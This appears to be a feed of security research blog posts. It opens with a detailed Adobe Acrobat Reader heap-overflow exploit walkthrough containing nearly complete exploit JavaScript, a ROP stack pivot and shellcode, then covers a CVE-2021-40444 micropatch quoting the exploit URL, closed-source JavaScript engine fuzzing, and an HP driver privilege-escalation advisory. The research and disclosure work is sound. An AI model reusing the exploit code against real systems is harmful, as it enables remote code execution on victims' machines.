  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Micropatches for the "File Extension" URL Scheme (CVE-2021-40444)

 


 

by Mitja Kolsek, the 0patch Team

September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally upon opening such document. This vulnerability was found under exploitation in the wild.

 

The Vulnerability

Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:

  1. Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.

  2. "File extension" URL scheme: For some reason, Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit was utilizing this "feature" to launch the previously downloaded executable file with the Control Panel application and have it executed via URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since .cpl extension is associated with control.exe, this app would get launched and given the provided path as an argument.

The second flaw is the more critical one, as there may exist various other ways to get a malicious file on user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such file.

 

Microsoft's Patch

What Microsoft's patch did was add a check before calling ShellExecute on the provided URL to block URL schemes beginning with a non-alphanumeric character - blocking schemes beginning with a dot such as ".cpl" -, and further limiting the allowed set of characters for the remaining string.

Note that ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across entire Windows, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully remotely delivered content can't find some other way towards ShellExecute that bypasses this new security check.


Our Micropatch

Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.

The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.

Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.

We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.

Our CVE-2021-40444 micropatches are therefore available for: 

  1. Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
  2. Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support) 
  3. Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support) 


Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.




In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO.
For a free trial, contact [email protected].
 
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.

We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.

To learn more about 0patch, please visit our Help Center.

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer), with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja  support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debugee pid or a process handle as an argument. So then, the question is, if you have multiple debugees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debugee (or starts a debugee process), the thread  that started/attached it is the debugger. Any subsequent calls for that particular debugee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/Tinyinst hybrid was running in a stable manner:

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.

JavaScript grammar was initially constructed by following  the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons by keeping as much code as possible from the kernel-module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

